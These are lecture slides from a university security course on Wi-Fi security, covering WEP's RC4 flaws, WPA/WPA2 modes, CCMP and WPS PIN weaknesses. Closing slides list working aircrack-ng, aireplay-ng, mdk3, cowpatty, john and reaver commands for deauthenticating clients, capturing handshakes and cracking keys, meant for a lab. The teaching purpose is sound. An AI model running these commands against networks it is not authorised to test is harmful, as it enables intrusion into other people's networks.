Wireless Security. Comp Sci 3600 Security. Attacks WEP WPA/WPA2. Authentication Encryption Vulnerabilities

Similar documents
Gaining Access to encrypted networks

ETHICAL HACKING OF WIRELESS NETWORKS IN KALI LINUX ENVIRONMENT

Vulnerability issues on research in WLAN encryption algorithms WEP WPA/WPA2 Personal

2013 Summer Camp: Wireless LAN Security Exercises JMU Cyber Defense Boot Camp

05 - WLAN Encryption and Data Integrity Protocols

Managing and Securing Computer Networks. Guy Leduc. Chapter 7: Securing LANs. Chapter goals: security in practice: Security in the data link layer

Hacking Encrypted Wireless Network

Nomadic Communications Labs

Section 4 Cracking Encryption and Authentication

Nomadic Communications Labs. Alessandro Villani

Missouri University of Science and Technology ACM SIG-Security 2014 Wi-Fi Workshop Exploitation Handbook

CS-435 spring semester Network Technology & Programming Laboratory. Stefanos Papadakis & Manolis Spanakis

Chapter 24 Wireless Network Security

D. The bank s web server is using an X.509 certificate that is not signed by a root CA, causing the user ID and password to be sent unencrypted.

Link & end-to-end protocols SSL/TLS WPA 2/25/07. Outline. Network Security. Networks. Link and End-to-End Protocols. Link vs. End-to-end protection

Lecture 33. Firewalls. Firewall Locations in the Network. Castle and Moat Analogy. Firewall Types. Firewall: Illustration. Security April 15, 2005

Security of WiFi networks MARCIN TUNIA

Wireless LAN Security. Gabriel Clothier

Physical and Link Layer Attacks

Using aircrack and a dictionary to crack a WPA data capture

NWD2705. User s Guide. Quick Start Guide. Dual-Band Wireless N450 USB Adapter. Version 1.00 Edition 1, 09/2012

Wireless Network Security

Outline : Wireless Networks Lecture 10: Management. Management and Control Services : Infrastructure Reminder.

The Final Nail in WEP s Coffin

4.4 IEEE MAC Layer Introduction Medium Access Control MAC Management Extensions

COSC4377. Chapter 8 roadmap

Wireless Network Security

Is Your Wireless Network Being Hacked?

What is Eavedropping?

WPA-GPG: Wireless authentication using GPG Key

WPA Passive Dictionary Attack Overview

SETTING UP THE LAB 1 UNDERSTANDING BASICS OF WI-FI NETWORKS 26

Wireless Security i. Lars Strand lars (at) unik no June 2004

WarDriving. related fixed line attacks war dialing port scanning

Improved KRACK Attacks Against WPA2 Implementations. Mathy OPCDE, Dubai, 7 April 2018

Chapter 17. Wireless Network Security

INTERNATIONAL JOURNAL OF PURE AND APPLIED RESEARCH IN ENGINEERING AND TECHNOLOGY

Wireless Network Security Spring 2015

5 Steps Wifi Hacking Cracking WPA2 Password

Wireless Network Security

Wireless technology Principles of Security


Wireless Attacks and Countermeasures

Configuring Wireless Security Settings on the RV130W

Security in IEEE Networks

HACKING & INFORMATION SECURITY Presents: - With TechNext

RC4. Invented by Ron Rivest. A stream cipher Generate keystream byte at a step

Csci388. Wireless and Mobile Security Access Control: 802.1X, EAP, and RADIUS. Importance of Access Control. WEP Weakness. Wi-Fi and IEEE 802.

Appendix E Wireless Networking Basics

Network Security. Security in local-area networks. Radboud University Nijmegen, The Netherlands. Autumn 2014

Stream Ciphers. Stream Ciphers 1

Temporal Key Integrity Protocol: TKIP. Tim Fielder University of Tulsa Tulsa, Oklahoma

HW/Lab 4: IPSec and Wireless Security. CS 336/536: Computer Network Security DUE 11 am on 12/01/2014 (Monday)

Troubleshooting WLANs (Part 2)

Security In Residential Wireless Local Area Networks. Carleton University COMP Fall James R. Relyea. Advisor: Michel Barbeau

This repository. Insights. Projects 0. Join GitHub today

Wireless Network Security Spring 2016

Summary on Crypto Primitives and Protocols

Chapter 8 Network Security

Procedure: You can find the problem sheet on the Desktop of the lab PCs.

KRACKing WPA2 in Practice Using Key Reinstallation Attacks. Mathy BlueHat IL, 24 January 2018

Configuring a WLAN for Static WEP

ISC. 10 October George Wong

Cryptanalysis. Ed Crowley

FAQ on Cisco Aironet Wireless Security

KRACKing WPA2 by Forcing Nonce Reuse. Mathy Chaos Communication Congress (CCC), 27 December 2017

Wireless Security Algorithms

Cryptography ThreeB. Ed Crowley. Fall 08

KRACKing WPA2 by Forcing Nonce Reuse. Mathy Nullcon, 2 March 2018

Wireless Network Security

Hooray, w Is Ratified... So, What Does it Mean for Your WLAN?

Overview of Security

ATTACKS TO CRYPTOGRAPHY PROTOCOLS OF WIRELESS INDUSTRIAL COMMUNICATION SYSTEMS

Today s challenge on Wireless Networking. David Leung, CISM Solution Consultant, Security Datacraft China/Hong Kong Ltd.

3 Symmetric Key Cryptography 3.1 Block Ciphers Symmetric key strength analysis Electronic Code Book Mode (ECB) Cipher Block Chaining Mode (CBC) Some

Table of Contents 1 WLAN Security Configuration Commands 1-1

WPA Migration Mode: WEP is back to haunt you

Analysis of Security or Wired Equivalent Privacy Isn t. Nikita Borisov, Ian Goldberg, and David Wagner

SharkFest'17 US. Basic workshop of. IEEE packet dissection. Megumi Takeshita

Analyzing Wireless Security in Columbia, Missouri

International Journal of Computer Engineering and Applications, Volume XII, Issue III, March 18, ISSN

Configuring the Client Adapter through the Windows XP Operating System

ATTACKS TO CRYPTOGRAPHY PROTOCOLS OF WIRELESS INDUSTRIAL COMMUNICATION SYSTEMS

Key Reinstallation Attacks: Forcing Nonce Reuse in WPA2. Mathy CCS 2017, 1 October 2017

CYBER ATTACKS EXPLAINED: WIRELESS ATTACKS

The Xirrus Wi Fi Array XS4, XS8 Security Policy Document Version 1.0. Xirrus, Inc.

A Configuration Protocol for Embedded Devices on Secure Wireless Networks

Expected Outcomes Able to design the network security for the entire network Able to develop and suggest the security plan and policy

Security and Authentication for Wireless Networks

WPA SECURITY (Wi-Fi Protected Access) Presentation. Douglas Cheathem (csc Spring 2007)

Protocols, Technologies and Standards Secure network protocols for the OSI stack P2.1 WLAN Security WPA, WPA2, IEEE i, IEEE 802.1X P2.

Wireless KRACK attack client side workaround and detection

IEEE i and wireless security

Lab Configure Enterprise Security on AP

All Your Biases Belong To Us: Breaking RC4 in WPA-TKIP and TLS

Cryptography. Recall from last lecture. [Symmetric] Encryption. How Cryptography Helps. One-time pad. Idea: Computational security

Network Security. Security in local-area networks. Radboud University Nijmegen, The Netherlands. Autumn 2014

Wireless Security Security problems in Wireless Networks

Securing Your Wireless LAN

COMP327 Mobile Computing Session: Lecture Set 6 - Personal Area Networks and Wireless Connections - Part 2

Transcription:

Wireless Security Comp Sci 3600 Security

Outline 1 2 3

Wired versus wireless Endpoint Access point Figure 24.1 Wireless Networking Components

Locations and types of attack

Outline 1 2 3

Wired Equivalent Privacy () Security algorithm for IEEE 802.11 wireless networks Part of the original 802.11 standard ratified in 1997 is recognizable by its key of 10 or 26 hexadecimal digits (40 or 104 bits), and was at one time widely in use and was often the first security choice presented to users by router configuration tools. C: encrypted I: data integrity check A: passphase authentication

Outline 1 2 3

authentication

authentication 1 A wireless host requests authentication by an access point. 2 The access point responds to the authentication request with a 128-byte nonce value. 3 The wireless host encrypts the nonce using the symmetric key that it shares with the access point. 4 The access point decrypts the host-encrypted nonce.

Outline 1 2 3

RC4

RC4

RC4 encryption

RC4 decryption

RC4 summary 1 First a 4-byte cyclic redundancy check value is computed for the data payload. 2 Key value (in this case, the 64-bit (K S, IV) key), 40 bits shared, IV is 24 bits 3 RC4 algorithm produces a stream of key values, k1 IV, kiv 2, kiv 3,... that are used to encrypt the data and CRC value in a frame.

and Decryption is performed by XOR-ing the ith byte of data, d i, with the ith key, ki IV, in the stream of key values generated by the (K S, IV ) pair to produce the ith byte of ciphertext, c i : c i = d i k IV i The IV value changes from one frame to the next and is included in plaintext in the header of each -encrypted 802.11 frame (previous slide) The receiver takes the secret 40-bit symmetric key that it shares with the sender, appends the IV, and uses the resulting 64-bit key (which is identical to the key used by the sender to perform encryption) to decrypt the frame: d i = c i k IV i

Outline 1 2 3

Flaw 1: keystream re-use Proper use of the RC4 algorithm requires that the same 64-bit key value never be used more than once. Recall that the key changes on a frame-by-frame basis. For a given K S (which changes rarely, if ever), this means that there are only 2 24 unique keys. If these keys are chosen randomly, the probability of having chosen the same IV value (and hence used the same 64-bit key) is more than 99 percent after only 12,000 frames. With 1 Kbyte frame sizes and a data transmission rate of 11 Mbps, only a few seconds are needed before 12,000 frames are transmitted. Since the IV is transmitted in plaintext in the frame, an eavesdropper will know whenever a duplicate IV value is used. Two frames that use the same IV likely use the same secret key and thus keystream

More flaws Cyclic redundancy check is not cryptographically secure: an attacker who changes the encrypted content (e.g., substituting gibberish for the original encrypted data), computes a CRC over the substituted gibberish, and places the CRC into a frame can produce an 802.11 frame that will be accepted by the receiver. Weak keys are often chosen PRNG bad too

https://en.wikipedia.org/wiki/aircrack-ng Let s check out a practical attack using our Kali VMs https: //kalitutorials.wordpress.com/2014/07/10/wifi-hack-crack-wep-passwords-with-kali/ http://www.wirelesshack.org/ step-by-step-kali-linux-and-wireless-hacking-basics-wep-hacking-part-3.html https://www.hackingloops.com/crack-wep-wifi-using-kali-linux/ https://teachmehacking.com/aircrack-ng-hack-wifi/ http://ultimatepeter.com/hacking-wifi-cracking-wep-with-kali-linux/ https: //lifehacker.com/5305094/how-to-crack-a-wi-fi-networks-wep-password-with-backtrack

Outline 1 2 3

WPA and WPA2 WPA (sometimes referred to as the draft IEEE 802.11i standard) became available in 2003. The Wi-Fi Alliance intended it as an intermediate measure in anticipation of the availability of the more secure and complex WPA2, which became available in 2004 and is a common shorthand for the full IEEE 802.11i (or IEEE 802.11i-2004) standard.

Outline 1 2 3

1 WPA-personal: Also referred to as WPA-PSK (pre-shared key) mode, this is designed for home and small office networks and doesn t require an authentication server 2 WPA-enterprise: Also referred to as WPA-802.1X mode, and sometimes just WPA (as opposed to WPA-PSK), this is designed for enterprise networks and requires a RADIUS authentication server. This requires a more complicated setup, but provides additional security (e.g. protection against dictionary attacks on short passwords). 3 Wi-Fi protected Setup (): This is an alternative authentication key distribution method intended to simplify and en the process, but which, as widely implemented, creates a major security hole via PIN recovery.

After the PSK or 802.1X authentication, a shared secret key is generated, called the Pairwise Master Key (PMK). The PMK is derived from a password that is put through PBKDF2-SHA1 as the cryptographic hash function. In a pre-shared-key network, the PMK is actually the PSK. If an 802.1X EAP exchange was carried out, the PMK is derived from the EAP parameters provided by the authentication server.

(PSK mode)

(PSK mode)

(PSK mode)

Outline 1 2 3

TKIP (Temporal Key Integrity Protocol): The RC4 stream cipher is used with a 128-bit per-packet key, meaning that it dynamically generates a new key for each packet. This is used by WPA. CCMP (CTR mode with CBC-MAC Protocol): The protocol used by WPA2, based on the Advanced Standard (AES) cipher along with strong message authenticity and integrity checking is significantly stronger in protection for both privacy and integrity than the RC4-based TKIP that is used by WPA. Informal names are AES and AES-CCMP

AES: CTR mode (nonce is IV here)

CBC-MAC To calculate the CBC-MAC of message m one encrypts m in CBC mode with zero initialization vector. Blocks m 1 m 2... m x using a secret key k and a block cipher E:

Outline 1 2 3

These come in two main categories 1 Exploits on proper function which has been mis-managed by the user Weak password 2 Actual flaws/bugs to be exploited WPA packet spoofing and decryption pin recovery MS-CHAPv2 design weakness Shared Group Temporal Key (GTK) flaw (hole196) Lack of forward secrecy (e.g., no use of DH) Predictable Group Temporal Key (GTK) KRACK attack (a replay attack)

Attack on weak passwords 1 Kick someone off their network 2 Capture the traffic when they perform their 4-way handshake, which contains a hash of the password 3 Crack the password offline using a dictionary, rainbow table, or brute force https://geekviews.tech/aircrack-ng-tutorial/ https://null-byte.wonderhowto.com/how-to/ hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng-0148366/

Attack on weak passwords Setup and choose network airmon-ng start wlan0 # put wlan0 in monitor mode airodump-ng wlan0mon # check out networks Capture traffic on network of interest airodump-ng -c 11 bssid 00:07:26:47:B0:35 -w capfile wlan0mon # capture traffic Deauthenticate (kick off) these are ALTERNATIVES aireplay-ng deauth 4 -a 00:07:26:47:B0:35 wlan0mon mdk3 wlan0mon d -b 00:07:26:47:B0:35 -c 4 aireplay-ng ignore-negative-one -0 10 -a AP MAC -c Client MAC wlan0mon Crack capfile offline these are ALTERNATIVES aircrack-ng -b 00:07:26:47:B0:35 capfile.cap -w /usr/share/john/password.lst #dictionary cowpatty -r acm dictionary-01.cap d dictionary hash s dictionary #rainbow-table john -stdout -incremental:all aircrack-ng -b 00:1a:c4:51:3c:31 -w acm dictionary-01.cap #brute force

Wifi Protected Setup Created by the Wi-Fi Alliance and introduced in 2006, the goal of the protocol is to allow home users who know little of wireless security and may be intimidated by the available security options to set up Wi-Fi Protected Access, as well as making it easy to add new devices to an existing network without entering long passphrases. When an enrollee attempts to gain access using a PIN, the registrar reports the validity of the first and second halves of the PIN separately. Since the first half of the pin consists of four digits (10,000 possibilities) and the second half has only three active digits (1000 possibilities), at most 11,000 guesses are needed before the PIN is recovered.

Wifi Protected Setup attack software Reaver (online/realtime attack) https://code.google.com/archive/p/reaver-wps/wikis/readme.wiki Bully (online/realtime attack) https://null-byte.wonderhowto.com/how-to/ hack-wi-fi-breaking-wps-pin-get-password-with-bully-0158819/ https://tools.kali.org/wireless-attacks/bully Pixie (offline attack specific to some vendors) in combination with Reaver or Bully https://github.com/wiire-a/pixiewps

Wifi Protected Setup: Reaver steps ifconfig # see your interface name airmon-ng start wlan0 # or your interface name airodum-ng wlan0mon # to see networks wash -i wlan0mon # to see networks only reaver -i wlan0mon bssid 00:01:02:03:04:05 # the good stuff # If you get rate-limited, there are many further options # You can also change your MAC first, but it needs to be specified in Reaver execution as a flag

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback